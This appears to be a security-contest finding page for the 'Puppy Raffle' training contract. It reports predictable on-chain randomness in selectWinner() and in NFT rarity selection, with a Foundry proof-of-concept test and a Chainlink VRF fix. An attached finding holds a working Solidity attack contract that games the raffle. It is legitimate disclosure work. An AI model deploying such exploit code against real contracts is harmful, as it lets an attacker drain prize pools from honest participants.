Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-02] Weak on-chain PRNG in `selectWinner()` lets attacker predict and guarantee winning every raffle

webrainsec

Description

selectWinner() computes the winner index from keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty)). All three inputs are known or controllable before the transaction executes. An attacker precomputes the winner index off-chain, then calls selectWinner() from an address that produces a winning index pointing to their own entry.

Vulnerability Details

// src/PuppyRaffle.sol, lines 128-129

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

msg.sender — the attacker controls which address calls the function
block.timestamp — known once the block is being built; miners/validators can adjust within ~15s range
block.difficulty — post-merge this is prevrandao, which validators know one epoch (6.4 min) in advance

The same weakness applies to rarity selection at line 139:

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

An attacker can choose their calling address to land in the rarity <= 5 bracket, guaranteeing a LEGENDARY puppy NFT.

Risk

Likelihood:

Any participant can run this computation locally. No special hardware, no MEV infrastructure, no bribing validators. A simple script iterates candidate addresses until it finds one that wins.

Impact:

The attacker wins 80% of the prize pool every raffle they enter. Combined with address manipulation for rarity, they also mint exclusively LEGENDARY NFTs. Honest participants never win.

PoC

The test precomputes the winner using the exact same formula, then calls selectWinner() and confirms the prediction matches.

function testExploit_PredictableWinner() public {

address[] memory players = new address[](4);

players[0] = address(1);

players[1] = address(2);

players[2] = address(3);

players[3] = address(4);

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

vm.warp(block.timestamp + duration + 1);

vm.roll(block.number + 1);

address caller = address(this);

uint256 predictedIndex = uint256(

keccak256(abi.encodePacked(caller, block.timestamp, block.difficulty))

) % 4;

address predictedWinner = players[predictedIndex];

puppyRaffle.selectWinner();

address actualWinner = puppyRaffle.previousWinner();

assertEq(actualWinner, predictedWinner, "Winner perfectly predicted");

}

Run: forge test --match-test testExploit_PredictableWinner -vvv — PASSES

Recommendations

Use Chainlink VRF v2 for verifiable randomness:

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ // Request random number from Chainlink VRF

+ uint256 requestId = COORDINATOR.requestRandomWords(keyHash, subId, confirmations, callbackGasLimit, 1);

+ // In fulfillRandomWords callback:

+ uint256 winnerIndex = randomWords[0] % players.length;

A commit-reveal scheme is another option if Chainlink integration is too heavy.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 11 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!